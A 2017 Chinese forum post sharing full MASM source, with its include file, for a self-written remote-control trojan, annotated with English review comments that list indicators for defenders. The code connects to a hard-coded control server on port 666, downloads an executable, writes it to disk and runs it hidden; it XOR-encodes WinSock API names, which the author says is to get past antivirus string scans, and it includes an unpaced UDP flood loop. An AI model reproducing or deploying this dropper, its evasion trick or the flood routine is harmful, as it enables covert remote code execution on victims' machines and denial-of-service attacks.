[汇编] 自己前几天用MASM写的一个远控
发表于 2017-6-3 11:11:13 | 显示全部楼层 |阅读模式

最先是在看雪发的 新开空间我也没啥东西 只能拿这个凑数了
;作者:落笔飞花笑百生
;日期:2014/12/20
;用处:练手
;写一个程序虽然很烂但是确实能学到很多,用汇编写程序能逼迫自己去学习以前高级语言中容易忽略的东西虽然还是不够。
;但是至少脱离了只能用别人封装好的库来写程序的恶性循环
;这个程序也没有了写下去的意思,该解决的都解决了我实在想不出来再写他具体能得到什么
;本来想把自己实现的getFUNCaddress加进去的,也没有这样做。
;DLL名称和函数名称由于直接这样写会被某些弱智杀软杀字符串没办法只能xor简单加密一下然后取地址再动态解密一下 这样过了表面
;二次开发的人注意:xor第一个字符不加密的


include androidprotect.inc
.code
; Hard-coded C2 host as a dotted-quad string; resolved with gethostbyname in
; `start` and connected to on port dport (666). It is placed in .code, so it is
; a plain static string inside the executable section (a static indicator for
; defenders). The commented-out line shows a domain-name variant of the same.
dipx byte "192.168.0.101",0
;dipx byte "anyou5.com",0
ganraoz proc
; Empty procedure — the body is a single `ret`. Not invoked anywhere on this
; page. The name looks like pinyin for "interference"; presumably filler with
; no functional effect — confirm.


ret


ganraoz endp
_CalcCheckSum  proc    _lpsz,_dwSize
;-----------------------------------------------------------------------
; _CalcCheckSum(_lpsz, _dwSize) — 16-bit ones'-complement packet checksum
; In:    _lpsz   = buffer address
;        _dwSize = buffer length in bytes
; Out:   eax = complemented sum in the low 16 bits. A carry out of the
;        final fold (`add eax,ebx` below) stays in bit 16 and is not
;        folded back in; only `ax` is complemented.
; Clobb: flags only — pushad/popad restore every GPR and eax is reloaded
;        from the local after popad.
; Note:  not invoked anywhere on this page. `loop @B` with ecx == 0
;        (_dwSize < 2) would wrap the counter, so callers must pass >= 2.
;-----------------------------------------------------------------------


          local  @dwSize                ; holds the result across popad





          pushad


          mov   ecx,_dwSize


        shr   ecx,1                     ; ecx = number of whole 16-bit words


        xor   ebx,ebx                   ; ebx = running 32-bit sum


        mov   esi,_lpsz


;********************************************************************


; packet checksum: accumulate every 16-bit word


;********************************************************************


        cld


        @@:


        lodsw                           ; ax = next word, esi += 2


        movzx  eax,ax                   ; clear the upper bits before the 32-bit add


        add   ebx,eax


        loop    @B


;********************************************************************


; if a single trailing byte is left over, add it as well


;********************************************************************


        test    _dwSize,1               ; odd length?


        jz   @F


        lodsb


        movzx  eax,al


        add   ebx,eax


        @@:


;********************************************************************


; fold the high 16 bits into the low 16, then complement and return


;********************************************************************


        mov   eax,ebx


        and   eax,0ffffh                ; eax = low half of the sum


        shr   ebx,16                    ; ebx = high half (the carries)


        add   eax,ebx                   ; may set bit 16; that bit is left as-is


        not   ax


        mov   @dwSize,eax               ; stash result: popad would overwrite eax


        popad


        mov   eax,@dwSize


        ret





_CalcCheckSum  endp
udpattack proc
; UDP send loop. Not invoked from any procedure on this page, and udpip /
; udpport are never written by visible code (they are zero-filled .data?
; storage). Opens a datagram socket (protocol 17 = UDP), resolves udpip,
; then — while uptrue == 1 — sends the ASCII decimal value of GetTickCount
; to udpip:udpport with no pacing at all. From the name, inferred to be a
; flood primitive; for defenders an unpaced sendto loop like this is an
; egress packet-rate anomaly on the sending host.
invoke m_socket,AF_INET, SOCK_DGRAM, 17
mov udpsock,eax                          ; not checked against INVALID_SOCKET
mov udpSin.sin_family, AF_INET
invoke gethtons,udpport
mov udpSin.sin_port,ax                   ; gethtons leaves the swapped port in ax
invoke m_gethostbyname,offset udpip
mov eax,[eax+12]                         ; hostent->h_addr_list (offset 12, 32-bit WinSock hostent); NULL not checked
mov eax,[eax]                            ; first address entry
mov eax,[eax]                            ; the 4-byte IPv4 address
invoke m_inet_ntoa,eax                   ; round-trips the address through a dotted string ...
invoke m_inet_addr,eax                   ; ... and back to a dword (the value was already usable)
mov udpSin.sin_addr.S_un.S_addr,eax
invoke m_setsockopt,udpsock,SOL_SOCKET,SO_SNDBUF,offset udpbuf,sizeof udpbuf   ; udpbuf is a dd holding 0
.while byte ptr [uptrue]==1
invoke GetTickCount
invoke dwtoa,eax,offset udpbuff          ; udpbuff = tick count as decimal text
invoke lstrlen,offset udpbuff
invoke m_sendto,udpsock,offset udpbuff,eax,0,offset udpSin,sizeof udpSin
.endw
invoke m_closesocket,udpsock
ret


udpattack endp


stringtodw proc string:dword,strsiz:dword
;date: 2014/12/23
;purpose: convert a string of decimal digits to a DWORD as-is (no validation)
;author: 落笔飞花笑百生
; In:  string = address of the digits, strsiz = maximum characters to consume
; Out: eax = value; per character ebx = ebx*10 + (c - '0'); stops at a NUL
;      byte or after strsiz characters. Non-digit bytes are folded in the
;      same way — nothing is validated.
; Note: ebx, esi and edi are overwritten and not preserved (a stdcall caller
;       that keeps state in them loses it). `ret 8` pops the two arguments.
xor eax,eax
mov edi,string                           ; edi = current character
xor ebx ,ebx                             ; ebx = accumulator
xor esi,esi


mov ecx,strsiz                           ; ecx = characters remaining


fuckmm:
MOVZX ESI,BYTE PTR DS:[EDI]
cmp esi,0
je close                                 ; NUL terminates early
LEA EAX,DWORD PTR DS:[EBX+EBX*4]         ; eax = ebx * 5
LEA EBX,DWORD PTR DS:[ESI+EAX*2-30h]     ; ebx = ebx * 10 + (c - '0')
INC EDI
loop fuckmm
close:
mov eax,ebx
ret 8
stringtodw endp
xorstring proc dstring,dsize:dword
;decode a string in place: XOR each byte with 5
; In:  dstring = buffer address, dsize = byte count (callers pass sizeof buffer)
; Out: eax = dstring + dsize, ecx = 0 (neither meaningful to callers); flags clobbered
; The first byte dstring[0] is skipped — `inc eax` runs before the XOR — which
; is the "first character is not encrypted" rule from the file header. The loop
; therefore covers dstring[1..dsize], so its last iteration touches the byte
; just past the buffer; in the .data layout that is the first byte of the
; 00,00 pad that follows each encoded string. XOR is its own inverse, so
; calling this twice on the same buffer re-encodes it.
mov eax,dstring
mov ecx,dsize
@@:
inc eax
xor byte ptr [eax],5


loop @B


ret
xorstring endp
gethtons proc port :dword
;port byte-order swap (host to network order for a 16-bit port)
; In:  port — read here directly as ss:[ebp+8], the first stack argument,
;      which is presumably the same slot MASM's generated frame maps `port`
;      to — confirm against the assembled prologue
; Out: eax = ((port & 0FFh) << 8) | ((port & 0FFFFh) >> 8); callers store ax
; Clobb: ecx, flags




mov eax,dword ptr ss:[ebp+8]
movzx ecx,ax                             ; ecx = low 16 bits of port
movzx eax,cl                             ; eax = low byte
shl eax,8                                ; ... moved to the high byte
shr ecx ,8                               ; ecx = high byte moved down
or eax,ecx

ret


gethtons endp








midstr proc a,b,cc,d:dword
;substring copy: copies bytes [cc, d) of a into b
; In:  a = source, b = destination, cc = start offset, d = end offset (exclusive)
; Out: b receives d - cc bytes. No terminating NUL is written and the count
;      is not checked (d < cc would give a huge rep count).
; Clobb: eax, ebx, ecx, flags. esi and edi are pushed (esi, then edi) but
;        popped in the same order (esi, then edi), so they return swapped
;        rather than preserved.
push esi
push edi


xor eax,eax
xor ebx,ebx
mov eax,d
mov ebx,cc
sub eax,ebx                              ; eax = d - cc
mov ecx,eax                              ; ecx = byte count for rep movsb
cld
mov esi,a
add esi ,cc                              ; esi = a + cc
mov edi,b
rep movsb
pop esi                                  ; receives the saved edi
pop edi                                  ; receives the saved esi
ret


midstr endp
ganraoy proc
; Empty procedure (single `ret`); not invoked on this page. Presumably
; filler like the other ganrao* procs — confirm.




ret


ganraoy endp


start proc
;worker-thread entry: C2 connect/retry loop and command dispatch
; Runs on the thread created in winmain. It does not return: the .repeat loop
; ends only when CLOSE becomes TRUE, and nothing on this page sets it; there
; is also no `ret` after the final WSACleanup.
; Observable behaviour a defender can key on: a TCP connect to dipx:dport
; (666) retried every 10 s, a file "<GetTickCount>.exe" dropped in the
; process's current directory and launched with WinExec(SW_HIDE), and the
; literal protocol tokens "XZ", "MZ", "GETPE!" and "FILECSWB!" on the wire.
invoke GetCommandLine                    ; result discarded
call $+5                                 ; each `call $+5` pushes the address of the next
call $+5                                 ; instruction and falls into it; nothing pops them,
call $+5                                 ; so 12 bytes stay on the stack — junk, presumably




jmp xaxa                                 ; jump to the very next instruction (no-op)
xaxa:
call getproaddress                       ; decode names, single-instance mutex, resolve ws2_32 imports
invoke m_WSAStartup,0202h,offset WSAData ; WinSock 2.2
.repeat
invoke m_socket,AF_INET, SOCK_STREAM, IPPROTO_TCP
.if eax!=INVALID_SOCKET


mov hSock,eax
mov Sin.sin_family, AF_INET
invoke gethtons,dport                    ; dport = 666
mov Sin.sin_port,ax
invoke m_gethostbyname,offset dipx       ; dipx = hard-coded dotted-quad string
mov eax,[eax+12]                         ; hostent->h_addr_list; NULL result not checked
mov eax,[eax]
mov eax,[eax]
invoke m_inet_ntoa,eax
invoke m_inet_addr,eax
mov Sin.sin_addr.S_un.S_addr,eax
invoke m_connect,hSock,addr Sin,sizeof Sin   ; return value not checked; recv below fails if it did


.endif
recvloop:
invoke RtlZeroMemory,offset flag,sizeof flag
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff   ; zeroed first, so a short message is NUL-terminated
invoke m_recv,hSock,offset recvbuff,sizeof recvbuff,0
.while eax>0 &&eax!=INVALID_SOCKET &&eax!=SOCKET_ERROR

invoke midstr,offset recvbuff,offset flag,0,2   ; flag = first two bytes of the message
invoke lstrcmpi,offset flag,offset xz
cmp eax,0
je xxz                                   ; "XZ<digits>" = size announcement

invoke midstr,offset recvbuff,offset flag,0,2
invoke lstrcmpi,offset flag,offset pe
cmp eax,0
je fuckfile                              ; "MZ..." = first chunk of a PE image
jmp recvloop                             ; anything else is ignored
;write out the PE file
fuckfile:
invoke GetCurrentDirectory,260,offset currd
invoke GetTickCount
invoke dwtoa,eax,offset filename         ; filename = "<tickcount>"
invoke lstrcat ,offset filename,$CTA0(".exe")   ; $CTA0: string macro from the included Strings.mac, presumably an inline zero-terminated literal
invoke lstrcat,offset currd,offset xiegang      ; currd = "<cwd>\"
invoke lstrcat,offset currd,offset filename     ; currd = "<cwd>\<tickcount>.exe"
;build the output file name and path
invoke DeleteFile,offset currd
;the data starts with MZ
invoke CreateFile,addr currd,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
mov hfilehandle,eax                      ; INVALID_HANDLE_VALUE not checked
invoke WriteFile,hfilehandle,offset recvbuff,sizeof recvbuff,offset oldwritebytes,NULL   ; always the full 1024-byte buffer, not the byte count received


loopwrite:
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke m_recv,hSock,offset recvbuff,sizeof recvbuff,0   ; return value not checked here
    invoke SetFilePointer,hfilehandle,NULL,NULL,FILE_END
    invoke WriteFile,hfilehandle,offset recvbuff,sizeof recvbuff,offset oldwritebytes,NULL   ; again a fixed 1024 bytes
    invoke GetFileSize,hfilehandle,NULL
    mov writebytes,eax
   cmp eax,dword ptr [dFileSize]         ; file grows in 1024-byte steps, so equality is only
    je close                             ; reached when the announced size is a multiple of 1024
    jmp loopwrite
   
close:
invoke CloseHandle,hfilehandle
mov dword ptr [dFileSize],0;clear the size
invoke RtlZeroMemory,offset recvbuff,sizeof recvbuff
invoke WinExec,offset currd,SW_HIDE;run the dropped file once the transfer is complete!
invoke m_send,hSock,offset filecs,sizeof filecs,0   ; acknowledge with "FILECSWB!"
jmp recvloop;
xxz:
invoke lstrlen,offset recvbuff
invoke midstr,offset recvbuff,offset dFileSize,2,eax   ; copies the size digits into dFileSize, which is a 4-byte dd —
                                                       ; more than three digits runs past it into mxhand and the strings after
invoke lstrlen,offset dFileSize
invoke stringtodw,offset dFileSize,eax
mov dword ptr [dFileSize],eax            ; dFileSize now holds the announced size as a number
invoke m_send,hSock,offset getpe,sizeof getpe,0   ; reply "GETPE!" to request the file
jmp recvloop

.endw






invoke m_closesocket,hSock
invoke Sleep,10000                       ; 10 s, then reconnect
.until CLOSE==TRUE                       ; CLOSE is never set on this page
invoke m_WSACleanup
; no `ret` here: were the loop ever to exit, execution would run off the end of the proc


start endp
winmain proc
; Program entry (`end winmain`). Creates the worker thread on `start` and
; returns at once — no wait, no ExitProcess. Presumably the process then
; lives for as long as the worker thread does — confirm.
invoke CreateThread,NULL,NULL,offset start,NULL,0,NULL;start the payload thread (lit. "little trojan thread")

ret


winmain endp
dwtoa proc dwValueWORD, lpBufferWORD
;signed DWORD to decimal ASCII string
; NOTE(review): the parameter list above reads `dwValueWORD, lpBufferWORD`
; while the body uses dwValue and lpBuffer; the ":D" of ":DWORD" appears to
; have been eaten by the forum's emoticon filter. The intended line is
; presumably `dwtoa proc dwValue:DWORD, lpBuffer:DWORD`, matching
; `dwtoa proto :dword,:dword` in the include file — confirm against the original.
; In:  dwValue  = value, treated as signed (negative gets a leading '-')
;      lpBuffer = destination; NUL-terminated on return
; Out: no meaningful register result; ebx/esi/edi preserved, eax/ecx/edx clobbered

nop                                      ; eight NOPs: no effect, presumably padding
nop
nop
nop
nop
nop
nop
nop


  push ebx
  push esi
  push edi


  mov eax, dwValue
  mov edi, [lpBuffer]                    ; edi = write position


  or eax,eax                             ; sets ZF/SF for the two checks below
  jnz sign

zero:
  mov word ptr [edi],30h                 ; value 0: write "0" followed by NUL
  jmp dw2asc

sign:
  jns pos
  mov byte ptr [edi],'-'                 ; negative: emit '-' and continue with |value|
  neg eax
  inc edi


pos:   
  mov ecx,429496730                      ; ~2^32/10: `mul ecx` leaves eax/10 in edx
  mov esi, edi                           ; esi = start of the digit run (for the reversal)


  .while (eax > 0)
   mov ebx,eax
   mul ecx
   mov eax,edx                           ; eax = quotient
   lea edx,[edx*4+edx]
   add edx,edx                           ; edx = quotient * 10
   sub ebx,edx                           ; ebx = remainder (the digit)
   add bl,'0'
   mov [edi],bl
   inc edi
  .endw


  mov byte ptr [edi], 0    ; terminate the string


  ; We now have all the digits, but in reverse order.


  .while (esi < edi)
   dec edi
   mov al, [esi]
   mov ah, [edi]
   mov [edi], al                         ; swap the outermost pair and move inwards
   mov [esi], ah
   inc esi
  .endw


  dw2asc:


  pop edi
  pop esi
  pop ebx


  ret


dwtoa endp
ganraox proc
; Net no-op: two pushes balanced by two pops, then `mov eax,eax`. Not invoked
; on this page; presumably filler — confirm.
push eax
push eax
pop eax
pop eax
mov eax,eax
ret


ganraox endp
ganraoxx proc
; Identical to ganraox: a net no-op that is not invoked on this page;
; presumably filler — confirm.
push eax
push eax
pop eax
pop eax
mov eax,eax
ret


ganraoxx endp
getproaddress proc
;resolve the API addresses
; 1. XOR-decodes the DLL name and the twelve WinSock function names in place
;    (xorstring, key 5, first byte untouched).
; 2. Single-instance check via the named mutex "bixanhuxakai": if it already
;    exists the process exits. The mutex name is a host-based indicator.
; 3. Resolves every ws2_32 function with LoadLibrary + GetProcAddress and
;    stores the pointers in the m_* variables. None of these appear in the
;    import table, so an import-table scan shows no networking API at all —
;    the decoded names and the mutex are the things to look for instead.
; Clobb: eax (and whatever the invoked APIs clobber). No result in registers.
invoke xorstring,offset ws32dll,sizeof ws32dll   ; -> "ws2_32.dll"
invoke xorstring,offset wstp,sizeof wstp         ; -> "WSAStartup"
invoke xorstring,offset sock,sizeof sock         ; -> "socket"
invoke xorstring,offset getby,sizeof getby       ; -> "gethostbyname"
invoke xorstring,offset inoa,sizeof inoa         ; -> "inet_ntoa"
invoke xorstring,offset inaddr,sizeof inaddr     ; -> "inet_addr"
invoke xorstring,offset cont,sizeof cont         ; -> "connect"
invoke xorstring,offset recvx,sizeof recvx       ; -> "recv"
invoke xorstring,offset colses,sizeof colses     ; -> "closesocket"
invoke xorstring,offset wcl,sizeof wcl           ; -> "WSACleanup"
invoke xorstring,offset sed,sizeof sed           ; -> "send"
invoke xorstring,offset sot,sizeof sot           ; -> "setsockopt"
invoke xorstring,offset sendtot,sizeof sendtot   ; -> "sendto"


;the calls above decode the strings
invoke CreateMutex,NULL,NULL,$TA0("bixanhuxakai")   ; $TA0: string macro from Strings.mac, presumably a zero-terminated literal
mov mxhand,eax
invoke GetLastError
.if eax== ERROR_ALREADY_EXISTS
invoke CloseHandle,offset mxhand         ; passes the address of mxhand, not the handle value
mov mxhand,0
invoke ExitProcess,NULL                  ; another instance is already running
.endif














; ws2_32.dll is LoadLibrary'd once per symbol (each call bumps its refcount)
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset wstp
mov m_WSAStartup,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sock
mov m_socket,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset getby
mov m_gethostbyname,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset inoa
mov m_inet_ntoa,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset inaddr
mov m_inet_addr,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset cont
mov m_connect,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset recvx
mov m_recv,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset colses
mov m_closesocket,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset wcl
mov m_WSACleanup,eax
invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sed
mov m_send,eax


invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sendtot
mov m_sendto,eax


invoke LoadLibrary,offset ws32dll
invoke GetProcAddress,eax,offset sot
mov m_setsockopt,eax
ret


getproaddress endp
ganrao proc
; Empty procedure (single `ret`); not invoked on this page. Presumably
; filler like the other ganrao* procs — confirm.


ret


ganrao endp
end winmain






下面是INC文件


.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include C:\Users\巫师\Desktop\RadASM\masm32\macros\Strings.mac


; Function-pointer types for the ws2_32 entry points that getproaddress
; resolves at run time (one `proto` per signature, then a `ptr` to it). The
; m_* variables in .data? are declared with the `ptr` types so `invoke` can
; call through them with argument checking.
_WSAStartup2 typedef proto :dword,:dword
_WSAStartup typedef ptr _WSAStartup2
_socket2 typedef proto :dword,:dword,:dword
_socket typedef ptr _socket2
_gethostbyname2 typedef proto :dword
_gethostbyname typedef ptr _gethostbyname2
_inet_ntoa2 typedef proto :dword
_inet_ntoa typedef ptr _inet_ntoa2
_inet_addr2 typedef proto :dword
_inet_addr typedef ptr _inet_addr2
_connect2 typedef proto :dword,:dword,:dword
_connect typedef ptr _connect2
_recv2 typedef proto :dword,:dword,:dword,:dword
_recv typedef ptr _recv2
_closesocket2 typedef proto :dword
_closesocket typedef ptr _closesocket2
_WSACleanup2 typedef proto
_WSACleanup typedef ptr _WSACleanup2
_send2 typedef proto :dword,:dword,:dword,:dword
_send typedef ptr _send2
_sendto2 typedef proto :dword,:dword,:dword,:dword,:dword,:dword
_sendto typedef ptr _sendto2
_setsockopt2 typedef proto :dword,:dword,:dword,:dword,:dword
_setsockopt typedef ptr _setsockopt2
; prototypes for the procs in the .asm file that are invoked before their definition
getproaddress proto
dwtoa proto :dword,:dword
gethtons proto:dword
.data?
; uninitialised storage (zero-filled at load)
currd byte 260 dup (?)                   ; full path of the dropped file ("<cwd>\<tickcount>.exe")
filename byte 50 dup (?)                 ; "<tickcount>.exe"
ipsize byte 50 dup (?)                   ; not referenced on this page
recvbuff byte 1024 dup (?);1 KB receive buffer — also the fixed write size of each file chunk
Sin   sockaddr_in <>                     ; C2 address (dipx:dport)
;UDP
udpSin   sockaddr_in <>
udpbuff byte 200 dup(?)
udpbuf dd 00                             ; passed to setsockopt SO_SNDBUF; zero here
udpport dd 00                            ; never assigned on this page
udpip byte 50 dup (?)                    ; never assigned on this page
udpsock dd 00
uptrue byte 01h                          ; NOTE(review): an initialiser inside .data? — whether 01h takes effect is not verifiable from this listing
;UDP
WSAData WSADATA <>
; function pointers filled in by getproaddress
m_WSAStartup _WSAStartup ?
m_socket _socket ?
m_gethostbyname _gethostbyname ?
m_inet_addr _inet_addr ?
m_inet_ntoa _inet_ntoa ?
m_connect _connect ?
m_recv _recv ?
m_closesocket _closesocket ?
m_WSACleanup _WSACleanup ?
m_send _send ?
m_setsockopt _setsockopt ?
m_sendto _sendto ?
.data
hfilehandle dd 00
writebytes dd 00
oldwritebytes dd 00
dFileSize dd 00                          ; announced size; `start` also copies the ASCII digits into this 4-byte slot first
mxhand dd 00                             ; mutex handle; lies directly after dFileSize
xz byte "XZ",0                           ; protocol token: size announcement
pe byte "MZ",0                           ; protocol token: PE image follows
flag byte 5 dup (?)                      ; first two bytes of each received message
dport dword 666                          ; C2 TCP port
CLOSE BOOL FALSE                         ; loop-exit flag; never set on this page
filecs byte "FILECSWB!",0                ; sent after the dropped file has been run
getpe byte "GETPE!",0                    ; sent to request the file
xiegang byte "\",0                       ; path separator
hSock dd 00
datalengh dd 00                          ; not referenced on this page
; The names below are stored XOR 5 with the first byte left as-is (see the
; file header and xorstring). Decoded values are given on each line. Each
; encoded string ends in 05h (decodes to NUL) and is followed by a 00,00 pad;
; xorstring's loop runs one byte past the string, so the first pad byte
; becomes 05h after decoding.
ws32dll byte 077h, 076h, 037h, 05Ah, 036h, 037h, 02Bh, 061h, 069h, 069h, 0005h   ; "ws2_32.dll"
xa byte 00,00
wstp byte  0057h ,0056h ,0044h ,0056h ,0071h, 0064h ,0077h ,0071h ,0070h ,0075h ,0005h   ; "WSAStartup"
xb byte 00,00
sock byte 073h ,06Ah ,066h ,06Eh ,060h ,0071h ,005h   ; "socket"
xc byte 00,00
getby byte 0067h ,0060h ,0071h ,006Dh ,006Ah ,0076h ,0071h ,0067h ,007Ch ,006Bh ,0064h ,068h ,060h ,005h   ; "gethostbyname"


xd byte 00,00
inoa byte 0069h ,006Bh ,0060h ,0071h ,005Ah ,006Bh ,0071h ,006Ah ,0064h ,005h   ; "inet_ntoa"




xe byte 00,00
inaddr byte 0069h, 006Bh, 0060h ,0071h, 005Ah, 0064h ,0061h, 0061h, 0077h, 0005h   ; "inet_addr"




xf byte 00,00
cont byte 0063h ,006Ah ,006Bh ,006Bh, 0060h, 0066h, 0071h ,0005h   ; "connect"




xg byte 00,00
recvx byte 0072h ,0060h ,0066h ,0073h ,0005h   ; "recv"




xh byte 00,00
colses byte 0063h ,0069h ,006Ah ,0076h ,0060h ,0076h, 006Ah, 0066h ,006Eh ,0060h ,0071h ,0005h   ; "closesocket"




xi byte 00,00
wcl byte 0057h, 0056h ,0044h, 0046h, 0069h ,060h ,0064h ,006Bh ,0070h ,0075h ,0005h   ; "WSACleanup"




xj byte 00,00
sed byte  0073h, 0060h, 006Bh, 0061h, 0005h   ; "send"


xk byte 00,00
sot byte 073h,060h,071h,076h,06Ah,066h,06Eh,06Ah,075h,071h,005h   ; "setsockopt"
xl byte 00,00
sendtot byte 073h,060h,06Bh,061h,071h,06Ah,005h   ; "sendto"
xm byte 00,00